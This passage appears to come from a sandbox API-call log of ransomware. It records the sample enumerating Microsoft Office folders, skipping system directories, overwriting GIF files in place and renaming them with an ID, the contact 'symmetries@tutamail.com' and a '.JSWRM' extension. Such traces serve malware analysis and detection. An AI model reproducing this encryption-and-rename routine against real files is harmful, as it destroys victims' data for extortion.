lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b75, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR1F.GIF", cAlternateFileName="")) returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2=".") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="..") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="...") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="windows") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="recovery") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="perflogs") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="documents and settings") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="system volume information") returned 1 [0120.113] lstrcmpiW (lpString1="ZPDIR1F.GIF", lpString2="msocache") returned 1 [0120.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0120.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR1F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR1F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR1F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0120.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0120.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR1F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR1F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR1F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0120.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0120.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR1F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir1f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.116] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7029) returned 1 [0120.116] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b70) returned 0x24e1d8 [0120.116] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1b70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1b70, lpOverlapped=0x0) returned 1 [0120.118] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.118] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1b70, lpOverlapped=0x0) returned 1 [0120.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.118] CloseHandle (hObject=0x314) returned 1 [0120.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0120.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0120.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0120.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0120.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.118] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR1F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir1f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR1F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir1f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0120.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0120.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0120.119] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc85, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR20F.GIF", cAlternateFileName="")) returned 1 [0120.119] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2=".") returned 1 [0120.119] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="..") returned 1 [0120.119] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="...") returned 1 [0120.119] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="windows") returned 1 [0120.120] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="recovery") returned 1 [0120.120] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="perflogs") returned 1 [0120.120] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="documents and settings") returned 1 [0120.120] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.120] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="system volume information") returned 1 [0120.120] lstrcmpiW (lpString1="ZPDIR20F.GIF", lpString2="msocache") returned 1 [0120.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR20F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR20F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR20F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0120.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR20F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR20F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR20F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0120.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR20F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir20f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.121] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3205) returned 1 [0120.121] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc80) returned 0x24e1d8 [0120.121] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xc80, lpOverlapped=0x0) returned 1 [0120.124] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.124] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xc80, lpOverlapped=0x0) returned 1 [0120.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.124] CloseHandle (hObject=0x314) returned 1 [0120.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0120.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0120.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0120.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0120.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.125] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR20F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir20f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR20F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir20f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0120.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0120.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.126] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42ea, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR21F.GIF", cAlternateFileName="")) returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2=".") returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="..") returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="...") returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="windows") returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="recovery") returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="perflogs") returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="documents and settings") returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.126] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="system volume information") returned 1 [0120.127] lstrcmpiW (lpString1="ZPDIR21F.GIF", lpString2="msocache") returned 1 [0120.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0120.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR21F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR21F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR21F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0120.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0120.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR21F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR21F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR21F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0120.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR21F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir21f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.128] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=17130) returned 1 [0120.128] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x42e0) returned 0x24e1d8 [0120.128] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x42e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x42e0, lpOverlapped=0x0) returned 1 [0120.131] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.131] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x42e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x42e0, lpOverlapped=0x0) returned 1 [0120.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.132] CloseHandle (hObject=0x314) returned 1 [0120.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0120.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0120.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0120.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0120.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.132] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR21F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir21f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR21F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir21f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0120.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0120.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.133] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1983, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR22F.GIF", cAlternateFileName="")) returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2=".") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="..") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="...") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="windows") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="recovery") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="perflogs") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="documents and settings") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="system volume information") returned 1 [0120.133] lstrcmpiW (lpString1="ZPDIR22F.GIF", lpString2="msocache") returned 1 [0120.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0120.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR22F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, 